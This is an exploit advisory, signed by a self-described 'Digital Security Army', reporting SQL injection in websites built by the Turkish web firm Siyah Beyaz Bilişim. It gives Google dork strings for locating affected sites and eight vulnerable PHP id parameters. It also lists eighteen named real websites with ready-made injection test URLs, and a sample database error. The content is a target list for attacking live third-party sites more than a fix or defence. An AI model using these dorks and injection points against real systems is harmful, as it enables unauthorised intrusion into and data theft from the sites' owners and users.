facebook facebook twitter rss

Siyah Beyaz Bilişim SQL Injection Vulnerability

Author: KingSkrupellos , Published: 23-11-2018
#################################################################################################

# Exploit Title : Siyah Beyaz Bilişim SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/11/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Tasarım ve Kodlama Siyah Beyaz Bilişim tarafından yapılmıştır.''
intext:''Tasarım ve Kodlama SiyahBeyazBilişim tarafından yapılmıştır.''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/yazi.php?id=[SQL Injection]

/resimler.php?id=[SQL Injection]

/sayfa.php?id=[SQL Injection]

/grup.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

/slider.php?id=[SQL Injection]

/sube.php?id=[SQL Injection]

/duyurular.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] => archive.is/cABYo

[+] sevennakliyat.com/resimler.php?id=3%27

[+] tucanteknik.com/sayfa.php?id=110%27

[+] turenyapi.com/grup.php?id=16%27

[+] saranlar.com/sube.php?id=2%27

[+] semirauto.com/grup.php?id=1%27

[+] aydinkompresor.net/kurumsal.php?id=4%27

[+] simgepastacilik.com/grup.php?id=12%27

[+] kocarlitarispamuk.com/grup.php?id=4%27

[+] royalmarine.com.tr/grup.php?id=2%27

[+] didimsanatakademisi.com/album.php?id=12%27

[+] dundarlarparke.com/grup.php?id=6%27

[+] aykimsan.com.tr/grup.php?id=22%27

[+] lilacambalkon.com/resimler.php?id=7%27

[+] avrupakulturakademi.com/sayfa.php?id=1%27

[+] novasluxe.com/sayfa.php?id=21%27

[+] megafit.com.tr/resimler.php?id=3%27

[+] dogrugunespaneli.com/grup.php?id=6%27

#################################################################################################

# Example SQL Database Error :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :